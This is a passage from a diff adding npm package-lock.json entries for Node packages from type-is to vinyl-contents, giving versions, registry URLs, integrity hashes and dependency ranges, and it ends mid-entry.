"sha512-Ne+eE4r0/iWnpAxD852z3A+N0Bt5RN//NjJwRd2VFHEmrywxf5vsZlh4R6lixl6B+wz/8d+maTSAkN1FIkI3LQ==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/type-is": { + "version": "1.6.18", + "resolved": "https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz", + "integrity": "sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g==", + "dependencies": { + "media-typer": "0.3.0", + "mime-types": "~2.1.24" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/typed-array-buffer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/typed-array-buffer/-/typed-array-buffer-1.0.2.tgz", + "integrity": "sha512-gEymJYKZtKXzzBzM4jqa9w6Q1Jjm7x2d+sh19AdsD4wqnMPDYyvwpsIc2Q/835kHuo3BEQ7CjelGhfTsoBb2MQ==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "es-errors": "^1.3.0", + "is-typed-array": "^1.1.13" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/typed-array-byte-length": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/typed-array-byte-length/-/typed-array-byte-length-1.0.1.tgz", + "integrity": "sha512-3iMJ9q0ao7WE9tWcaYKIptkNBuOIcZCCT0d4MRvuuH88fEoEH62IuQe0OtraD3ebQEoTRk8XCBoknUNc1Y67pw==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "for-each": "^0.3.3", + "gopd": "^1.0.1", + "has-proto": "^1.0.3", + "is-typed-array": "^1.1.13" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/typed-array-byte-offset": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/typed-array-byte-offset/-/typed-array-byte-offset-1.0.2.tgz", + "integrity": "sha512-Ous0vodHa56FviZucS2E63zkgtgrACj7omjwd/8lTEMEPFFyjfixMZ1ZXenpgCFBBt4EC1J2XsyVS2gkG0eTFA==", + "license": "MIT", + "dependencies": { + "available-typed-arrays": "^1.0.7", + "call-bind": "^1.0.7", + "for-each": "^0.3.3", + "gopd": "^1.0.1", + "has-proto": "^1.0.3", + "is-typed-array": "^1.1.13" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/typed-array-length": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/typed-array-length/-/typed-array-length-1.0.6.tgz", + "integrity": "sha512-/OxDN6OtAk5KBpGb28T+HZc2M+ADtvRxXrKKbUwtsLgdoxgX13hyy7ek6bFRl5+aBs2yZzB0c4CnQfAtVypW/g==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "for-each": "^0.3.3", + "gopd": "^1.0.1", + "has-proto": "^1.0.3", + "is-typed-array": "^1.1.13", + "possible-typed-array-names": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/typedarray": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", + "integrity": "sha1-hnrHTjhkGHsdPUfZlqeOxciDB3c=" + }, + "node_modules/typedarray.prototype.slice": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/typedarray.prototype.slice/-/typedarray.prototype.slice-1.0.3.tgz", + "integrity": "sha512-8WbVAQAUlENo1q3c3zZYuy5k9VzBQvp8AX9WOtbvyWlLM1v5JaSRmjubLjzHF4JFtptjH/5c/i95yaElvcjC0A==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.0", + "es-errors": "^1.3.0", + "typed-array-buffer": "^1.0.2", + "typed-array-byte-offset": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/typescript": { + "version": "5.5.4", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.5.4.tgz", + "integrity": "sha512-Mtq29sKDAEYP7aljRgtPOpTvOfbwRWlS6dPRzwjdE+C0R4brX/GUyhHSecbHMFLNBLcJIPt9nl9yG5TZ1weH+Q==", + "dev": true, + "bin": { + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" + }, + "engines": { + "node": ">=14.17" + } + }, + "node_modules/typical": { + "version": "2.6.1", + "resolved": "https://registry.npmjs.org/typical/-/typical-2.6.1.tgz", + "integrity": "sha1-XAgOXWYcu+OCWdLnCjxyU+hziB0=" + }, + "node_modules/uc.micro": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/uc.micro/-/uc.micro-1.0.6.tgz", + "integrity": "sha512-8Y75pvTYkLJW2hWQHXxoqRgV7qb9B+9vFEtidML+7koHUFapnVJAZ6cKs+Qjz5Aw3aZWHMC6u0wJE3At+nSGwA==", + "dev": true + }, + "node_modules/ufo": { + "version": "1.5.4", + "resolved": "https://registry.npmjs.org/ufo/-/ufo-1.5.4.tgz", + "integrity": "sha512-UsUk3byDzKd04EyoZ7U4DOlxQaD14JUKQl6/P7wiX4FNvUfm3XL246n9W5AmqwW5RSFJ27NAuM0iLscAOYUiGQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/uglify-js": { + "version": "3.15.0", + "resolved": "https://registry.npmjs.org/uglify-js/-/uglify-js-3.15.0.tgz", + "integrity": "sha512-x+xdeDWq7FiORDvyIJ0q/waWd4PhjBNOm5dQUOq2AKC0IEjxOS66Ha9tctiVDGcRQuh69K7fgU5oRuTK4cysSg==", + "bin": { + "uglifyjs": "bin/uglifyjs" + }, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/uid-safe": { + "version": "2.1.5", + "resolved": "https://registry.npmjs.org/uid-safe/-/uid-safe-2.1.5.tgz", + "integrity": "sha512-KPHm4VL5dDXKz01UuEd88Df+KzynaohSL9fBh096KWAxSKZQDI2uBrVqtvRM4rwrIrRRKsdLNML/lnaaVSRioA==", + "dependencies": { + "random-bytes": "~1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/uid2": { + "version": "0.0.4", + "resolved": "https://registry.npmjs.org/uid2/-/uid2-0.0.4.tgz", + "integrity": "sha512-IevTus0SbGwQzYh3+fRsAMTVVPOoIVufzacXcHPmdlle1jUpq7BRL+mw3dgeLanvGZdwwbWhRV6XrcFNdBmjWA==" + }, + "node_modules/ultron": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/ultron/-/ultron-1.0.2.tgz", + "integrity": "sha512-QMpnpVtYaWEeY+MwKDN/UdKlE/LsFZXM5lO1u7GaZzNgmIbGixHEmVMIKT+vqYOALu3m5GYQy9kz4Xu4IVn7Ow==" + }, + "node_modules/umzug": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/umzug/-/umzug-2.3.0.tgz", + "integrity": "sha512-Z274K+e8goZK8QJxmbRPhl89HPO1K+ORFtm6rySPhFKfKc5GHhqdzD0SGhSWHkzoXasqJuItdhorSvY7/Cgflw==", + "dev": true, + "dependencies": { + "bluebird": "^3.7.2" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/unbox-primitive": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/unbox-primitive/-/unbox-primitive-1.0.2.tgz", + "integrity": "sha512-61pPlCD9h51VoreyJ0BReideM3MDKMKnh6+V9L08331ipq6Q8OFXZYiqP6n/tbHx4s5I9uRhcye6BrbkizkBDw==", + "dependencies": { + "call-bind": "^1.0.2", + "has-bigints": "^1.0.2", + "has-symbols": "^1.0.3", + "which-boxed-primitive": "^1.0.2" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/uncontrollable": { + "version": "7.2.1", + "resolved": "https://registry.npmjs.org/uncontrollable/-/uncontrollable-7.2.1.tgz", + "integrity": "sha512-svtcfoTADIB0nT9nltgjujTi7BzVmwjZClOmskKu/E8FW9BXzg9os8OLr4f8Dlnk0rYWJIWr4wv9eKUXiQvQwQ==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.6.3", + "@types/react": ">=16.9.11", + "invariant": "^2.2.4", + "react-lifecycles-compat": "^3.0.4" + }, + "peerDependencies": { + "react": ">=15.0.0" + } + }, + "node_modules/undefsafe": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/undefsafe/-/undefsafe-2.0.5.tgz", + "integrity": "sha512-WxONCrssBM8TSPRqN5EmsjVrsv4A8X12J4ArBiiayv3DyyG3ZlIg6yysuuSYdZsVz3TKcTg2fd//Ujd4CHV1iA==", + "dev": true + }, + "node_modules/underscore": { + "version": "1.13.6", + "resolved": "https://registry.npmjs.org/underscore/-/underscore-1.13.6.tgz", + "integrity": "sha512-+A5Sja4HP1M08MaXya7p5LvjuM7K6q/2EaC0+iovj/wOcMsTzMvDFbasi/oSapiwOlt252IqsKqPjCl7huKS0A==" + }, + "node_modules/uni-global": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/uni-global/-/uni-global-1.0.0.tgz", + "integrity": "sha512-WWM3HP+siTxzIWPNUg7hZ4XO8clKi6NoCAJJWnuRL+BAqyFXF8gC03WNyTefGoUXYc47uYgXxpKLIEvo65PEHw==", + "dependencies": { + "type": "^2.5.0" + } + }, + "node_modules/unicode-canonical-property-names-ecmascript": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-canonical-property-names-ecmascript/-/unicode-canonical-property-names-ecmascript-2.0.0.tgz", + "integrity": "sha512-yY5PpDlfVIU5+y/BSCxAJRBIS1Zc2dDG3Ujq+sR0U+JjUevW2JhocOF+soROYDSaAezOzOKuyyixhD6mBknSmQ==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/unicode-match-property-ecmascript": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-match-property-ecmascript/-/unicode-match-property-ecmascript-2.0.0.tgz", + "integrity": "sha512-5kaZCrbp5mmbz5ulBkDkbY0SsPOjKqVS35VpL9ulMPfSl0J0Xsm+9Evphv9CoIZFwre7aJoa94AY6seMKGVN5Q==", + "dev": true, + "dependencies": { + "unicode-canonical-property-names-ecmascript": "^2.0.0", + "unicode-property-aliases-ecmascript": "^2.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/unicode-match-property-value-ecmascript": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/unicode-match-property-value-ecmascript/-/unicode-match-property-value-ecmascript-2.1.0.tgz", + "integrity": "sha512-qxkjQt6qjg/mYscYMC0XKRn3Rh0wFPlfxB0xkt9CfyTvpX1Ra0+rAmdX2QyAobptSEvuy4RtpPRui6XkV+8wjA==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/unicode-property-aliases-ecmascript": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/unicode-property-aliases-ecmascript/-/unicode-property-aliases-ecmascript-2.1.0.tgz", + "integrity": "sha512-6t3foTQI9qne+OZoVQB/8x8rk2k1eVy1gRXhV3oFQ5T6R1dqQ1xtin3XqSlx3+ATBkliTaR/hHyJBm+LVPNM8w==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/unicorn-magic": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/unicorn-magic/-/unicorn-magic-0.3.0.tgz", + "integrity": "sha512-+QBBXBCvifc56fsbuxZQ6Sic3wqqc3WWaqxs58gvJrcOuN83HGTCwz3oS5phzU9LthRNE9VrJCFCLUgHeeFnfA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/union-value": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/union-value/-/union-value-1.0.1.tgz", + "integrity": "sha512-tJfXmxMeWYnczCVs7XAEvIV7ieppALdyepWMkHkwciRpZraG/xwT+s2JN8+pr1+8jCRf80FFzvr+MpQeeoF4Xg==", + "dev": true, + "dependencies": { + "arr-union": "^3.1.0", + "get-value": "^2.0.6", + "is-extendable": "^0.1.1", + "set-value": "^2.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/union-value/node_modules/is-extendable": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-0.1.1.tgz", + "integrity": "sha512-5BMULNob1vgFX6EjQw5izWDxrecWK9AM72rugNr0TFldMOi0fj6Jk+zeKIt0xGj4cEfQIJth4w3OKWOJ4f+AFw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/universalify": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/universalify/-/universalify-2.0.0.tgz", + "integrity": "sha512-hAZsKq7Yy11Zu1DE0OzWjw7nnLZmJZYTDZZyEFHZdUhV8FkH5MCfoU1XMaxXovpyW5nq5scPqq0ZDP9Zyl04oQ==", + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/unpipe": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz", + "integrity": "sha1-sr9O6FFKrmFltIF4KdIbLvSZBOw=", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/unplugin": { + "version": "1.16.1", + "resolved": "https://registry.npmjs.org/unplugin/-/unplugin-1.16.1.tgz", + "integrity": "sha512-4/u/j4FrCKdi17jaxuJA0jClGxB1AvU2hw/IuayPc4ay1XGaJs/rbb4v5WKwAjNifjmXK9PIFyuPiaK8azyR9w==", + "dev": true, + "license": "MIT", + "dependencies": { + "acorn": "^8.14.0", + "webpack-virtual-modules": "^0.6.2" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/unplugin/node_modules/acorn": { + "version": "8.14.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.14.1.tgz", + "integrity": "sha512-OvQ/2pUDKmgfCg++xsTX1wGxfTaszcHVcTctW4UJB4hibJx2HXxxO5UmVgyjMa+ZDsiaf5wWLXYpRWMmBI0QHg==", + "dev": true, + "license": "MIT", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/unset-value": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/unset-value/-/unset-value-1.0.0.tgz", + "integrity": "sha512-PcA2tsuGSF9cnySLHTLSh2qrQiJ70mn+r+Glzxv2TWZblxsxCC52BDlZoPCsz7STd9pN7EZetkWZBAvk4cgZdQ==", + "dev": true, + "dependencies": { + "has-value": "^0.3.1", + "isobject": "^3.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/unset-value/node_modules/has-value": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/has-value/-/has-value-0.3.1.tgz", + "integrity": "sha512-gpG936j8/MzaeID5Yif+577c17TxaDmhuyVgSwtnL/q8UUTySg8Mecb+8Cf1otgLoD7DDH75axp86ER7LFsf3Q==", + "dev": true, + "dependencies": { + "get-value": "^2.0.3", + "has-values": "^0.1.4", + "isobject": "^2.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/unset-value/node_modules/has-value/node_modules/isobject": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/isobject/-/isobject-2.1.0.tgz", + "integrity": "sha512-+OUdGJlgjOBZDfxnDjYYG6zp487z0JGNQq3cYQYg5f5hKR+syHMsaztzGeml/4kGG55CSpKSpWTY+jYGgsHLgA==", + "dev": true, + "dependencies": { + "isarray": "1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/unset-value/node_modules/has-values": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/has-values/-/has-values-0.1.4.tgz", + "integrity": "sha512-J8S0cEdWuQbqD9//tlZxiMuMNmxB8PlEwvYwuxsTmR1G5RXUePEX/SJn7aD0GMLieuZYSwNH0cQuJGwnYunXRQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/unset-value/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==", + "dev": true + }, + "node_modules/untildify": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/untildify/-/untildify-4.0.0.tgz", + "integrity": "sha512-KK8xQ1mkzZeg9inewmFVDNkg3l5LUhoq9kN6iWYB/CC9YMG8HA+c1Q8HwDe6dEX7kErrEVNVBO3fWsVq5iDgtw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/update-browserslist-db": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.0.tgz", + "integrity": "sha512-EdRAaAyk2cUE1wOf2DkEhzxqOQvFOoRJFNS6NeyJ01Gp2beMRpBAINjM2iDXE3KCuKhwnvHIQCJm6ThL2Z+HzQ==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/browserslist" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "dependencies": { + "escalade": "^3.1.2", + "picocolors": "^1.0.1" + }, + "bin": { + "update-browserslist-db": "cli.js" + }, + "peerDependencies": { + "browserslist": ">= 4.21.0" + } + }, + "node_modules/uri-js": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", + "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", + "dependencies": { + "punycode": "^2.1.0" + } + }, + "node_modules/urix": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/urix/-/urix-0.1.0.tgz", + "integrity": "sha512-Am1ousAhSLBeB9cG/7k7r2R0zj50uDRlZHPGbazid5s9rlF1F/QKYObEKSIunSjIOkJZqwRRLpvewjEkM7pSqg==", + "deprecated": "Please see https://github.com/lydell/urix#deprecated", + "dev": true + }, + "node_modules/url": { + "version": "0.10.3", + "resolved": "https://registry.npmjs.org/url/-/url-0.10.3.tgz", + "integrity": "sha1-Ah5NnHcF8hu/N9A861h2dAJ3TGQ=", + "dependencies": { + "punycode": "1.3.2", + "querystring": "0.2.0" + } + }, + "node_modules/url-loader": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/url-loader/-/url-loader-4.1.1.tgz", + "integrity": "sha512-3BTV812+AVHHOJQO8O5MkWgZ5aosP7GnROJwvzLS9hWDj00lZ6Z0wNak423Lp9PBZN05N+Jk/N5Si8jRAlGyWA==", + "dev": true, + "dependencies": { + "loader-utils": "^2.0.0", + "mime-types": "^2.1.27", + "schema-utils": "^3.0.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "file-loader": "*", + "webpack": "^4.0.0 || ^5.0.0" + }, + "peerDependenciesMeta": { + "file-loader": { + "optional": true + } + } + }, + "node_modules/url-parse": { + "version": "1.5.10", + "resolved": "https://registry.npmjs.org/url-parse/-/url-parse-1.5.10.tgz", + "integrity": "sha512-WypcfiRhfeUP9vvF0j6rw0J3hrWrw6iZv3+22h6iRMJ/8z1Tj6XfLP4DsUix5MhMPnXpiHDoKyoZ/bdCkwBCiQ==", + "dependencies": { + "querystringify": "^2.1.1", + "requires-port": "^1.0.0" + } + }, + "node_modules/url-template": { + "version": "2.0.8", + "resolved": "https://registry.npmjs.org/url-template/-/url-template-2.0.8.tgz", + "integrity": "sha512-XdVKMF4SJ0nP/O7XIPB0JwAEuT9lDIYnNsK8yGVe43y0AWoKeJNdv3ZNWh7ksJ6KqQFjOO6ox/VEitLnaVNufw==" + }, + "node_modules/url/node_modules/punycode": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/punycode/-/punycode-1.3.2.tgz", + "integrity": "sha1-llOgNvt8HuQjQvIyXM7v6jkmxI0=" + }, + "node_modules/use": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/use/-/use-3.1.1.tgz", + "integrity": "sha512-cwESVXlO3url9YWlFW/TA9cshCEhtu7IKJ/p5soJ/gGpj7vbvFrAY/eIioQ6Dw23KjZhYgiIo8HOs1nQ2vr/oQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/utf-8-validate": { + "version": "5.0.8", + "resolved": "https://registry.npmjs.org/utf-8-validate/-/utf-8-validate-5.0.8.tgz", + "integrity": "sha512-k4dW/Qja1BYDl2qD4tOMB9PFVha/UJtxTc1cXYOe3WwA/2m0Yn4qB7wLMpJyLJ/7DR0XnTut3HsCSzDT4ZvKgA==", + "hasInstallScript": true, + "dependencies": { + "node-gyp-build": "^4.3.0" + }, + "engines": { + "node": ">=6.14.2" + } + }, + "node_modules/utf-8-validate/node_modules/node-gyp-build": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/node-gyp-build/-/node-gyp-build-4.3.0.tgz", + "integrity": "sha512-iWjXZvmboq0ja1pUGULQBexmxq8CV4xBhX7VDOTbL7ZR4FOowwY/VOtRxBN/yKxmdGoIp4j5ysNT4u3S2pDQ3Q==", + "bin": { + "node-gyp-build": "bin.js", + "node-gyp-build-optional": "optional.js", + "node-gyp-build-test": "build-test.js" + } + }, + "node_modules/utf8-byte-length": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/utf8-byte-length/-/utf8-byte-length-1.0.4.tgz", + "integrity": "sha512-4+wkEYLBbWxqTahEsWrhxepcoVOJ+1z5PGIjPZxRkytcdSUaNjIjBM7Xn8E+pdSuV7SzvWovBFA54FO0JSoqhA==", + "dev": true + }, + "node_modules/util": { + "version": "0.12.5", + "resolved": "https://registry.npmjs.org/util/-/util-0.12.5.tgz", + "integrity": "sha512-kZf/K6hEIrWHI6XqOFUiiMa+79wE/D8Q+NCNAWclkyg3b4d2k7s0QGepNjiABc+aR3N1PAyHL7p6UcLY6LmrnA==", + "dependencies": { + "inherits": "^2.0.3", + "is-arguments": "^1.0.4", + "is-generator-function": "^1.0.7", + "is-typed-array": "^1.1.3", + "which-typed-array": "^1.1.2" + } + }, + "node_modules/util-deprecate": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", + "integrity": "sha1-RQ1Nyfpw3nMnYvvS1KKJgUGaDM8=" + }, + "node_modules/util.promisify": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/util.promisify/-/util.promisify-1.1.1.tgz", + "integrity": "sha512-/s3UsZUrIfa6xDhr7zZhnE9SLQ5RIXyYfiVnMMyMDzOc8WhWN4Nbh36H842OyurKbCDAesZOJaVyvmSl6fhGQw==", + "dependencies": { + "call-bind": "^1.0.0", + "define-properties": "^1.1.3", + "for-each": "^0.3.3", + "has-symbols": "^1.0.1", + "object.getownpropertydescriptors": "^2.1.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/utila": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/utila/-/utila-0.4.0.tgz", + "integrity": "sha1-ihagXURWV6Oupe7MWxKk+lN5dyw=", + "dev": true + }, + "node_modules/utils-flatten": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/utils-flatten/-/utils-flatten-1.0.0.tgz", + "integrity": "sha1-AfMNMZO+RkxAsxdV5nQNDbDO8kM=", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/utils-merge": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.1.tgz", + "integrity": "sha1-n5VxD1CiZ5R7LMwSR0HBAoQn5xM=", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/uuid": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", + "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", + "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", + "bin": { + "uuid": "bin/uuid" + } + }, + "node_modules/v8-compile-cache": { + "version": "2.4.0", + "resolved": "https://registry.npmjs.org/v8-compile-cache/-/v8-compile-cache-2.4.0.tgz", + "integrity": "sha512-ocyWc3bAHBB/guyqJQVI5o4BZkPhznPYUG2ea80Gond/BgNWpap8TOmLSeeQG7bnh2KMISxskdADG59j7zruhw==", + "dev": true + }, + "node_modules/v8-to-istanbul": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", + "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", + "dev": true, + "dependencies": { + "@jridgewell/trace-mapping": "^0.3.12", + "@types/istanbul-lib-coverage": "^2.0.1", + "convert-source-map": "^1.6.0" + }, + "engines": { + "node": ">=10.12.0" + } + }, + "node_modules/valid-data-url": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/valid-data-url/-/valid-data-url-2.0.0.tgz", + "integrity": "sha512-dyCZnv3aCey7yfTgIqdZanKl7xWAEEKCbgmR7SKqyK6QT/Z07ROactrgD1eA37C69ODRj7rNOjzKWVPh0EUjBA==", + "engines": { + "node": ">=6" + } + }, + "node_modules/valid-url": { + "version": "1.0.9", + "resolved": "https://registry.npmjs.org/valid-url/-/valid-url-1.0.9.tgz", + "integrity": "sha1-HBRHm0DxOXp1eC8RXkCGRHQzogA=" + }, + "node_modules/validate-npm-package-license": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", + "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", + "dev": true, + "dependencies": { + "spdx-correct": "^3.0.0", + "spdx-expression-parse": "^3.0.0" + } + }, + "node_modules/validator": { + "version": "13.7.0", + "resolved": "https://registry.npmjs.org/validator/-/validator-13.7.0.tgz", + "integrity": "sha512-nYXQLCBkpJ8X6ltALua9dRrZDHVYxjJ1wgskNt1lH9fzGjs3tgojGSCBjmEPwkWS1y29+DrizMTW19Pr9uB2nw==", + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/value-or-function": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/value-or-function/-/value-or-function-4.0.0.tgz", + "integrity": "sha512-aeVK81SIuT6aMJfNo9Vte8Dw0/FZINGBV8BfCraGtqVxIeLAEhJyoWs8SmvRVmXfGss2PmmOwZCuBPbZR+IYWg==", + "dev": true, + "engines": { + "node": ">= 10.13.0" + } + }, + "node_modules/vary": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/vary/-/vary-1.1.2.tgz", + "integrity": "sha1-IpnwLG3tMNSllhsLn3RSShj2NPw=", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/verror": { + "version": "1.10.0", + "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", + "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "assert-plus": "^1.0.0", + "core-util-is": "1.0.2", + "extsprintf": "^1.2.0" + } + }, + "node_modules/verror/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/vinyl": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/vinyl/-/vinyl-3.0.0.tgz", + "integrity": "sha512-rC2VRfAVVCGEgjnxHUnpIVh3AGuk62rP3tqVrn+yab0YH7UULisC085+NYH+mnqf3Wx4SpSi1RQMwudL89N03g==", + "dev": true, + "dependencies": { + "clone": "^2.1.2", + "clone-stats": "^1.0.0", + "remove-trailing-separator": "^1.1.0", + "replace-ext": "^2.0.0", + "teex": "^1.0.1" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/vinyl-contents": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/vinyl-contents/-/vinyl-contents-2.0.0.tgz", + "integrity": "sha512-cHq6NnGyi2pZ7xwdHSW1v4Jfnho4TEGtxZHw01cmnc8+i7jgR6bRnED/LbrKan/Q7CvVLbnvA5OepnhbpjBZ5Q==", + "dev": true, + "dependencies": { + "bl": "^5.0.0", + "vinyl": "^3.0.0" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/vinyl-contents/node_modules/bl": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/bl/-/bl-5.1.0.tgz", + "integrity": "sha512-tv1ZJHLfTDnXE6tMHv73YgSJaWR2AFuPwMntBe7XL/GBFHnT0CLnsHMogfk5+GzCDC5ZWarSCYaIGATZt9dNsQ==", + "dev": true, + "dependencies": { + "buffer": "^6.0.3", + "inherits": "^2.0.4", + "readable-stream": "^3.4.0" + } + }, + "node_modules/vinyl-contents/node_modules/buffer": { + "version": "6.0.3", + "resolved": 